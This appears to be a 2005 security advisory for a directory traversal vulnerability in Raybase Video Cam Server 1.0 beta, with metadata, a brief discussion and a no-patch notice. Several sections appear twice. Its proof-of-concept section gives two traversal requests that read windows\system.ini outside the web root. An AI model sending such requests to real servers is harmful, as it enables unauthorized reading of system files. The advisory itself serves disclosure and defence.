Video Cam Server Directory Traversal Vulnerability
BID:13456
Info
Video Cam Server Directory Traversal Vulnerability
| Bugtraq ID: | 13456 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 02 2005 12:00AM |
| Updated: | May 02 2005 12:00AM |
| Credit: | Discovery credited to Donato Ferrante <[email protected]>. |
| Vulnerable: |
Raybase Video Cam Server 1.0 beta |
| Not Vulnerable: | |
Discussion
Video Cam Server Directory Traversal Vulnerability
Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root.
Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root.
Exploit / POC
Video Cam Server Directory Traversal Vulnerability
An exploit is not required.
The following examples are provided:
http://www.example.com/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
GET /../../../../../../../../../../../windows/system.ini HTTP/1.1
An exploit is not required.
The following examples are provided:
http://www.example.com/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini
GET /../../../../../../../../../../../windows/system.ini HTTP/1.1
Solution / Fix
Video Cam Server Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.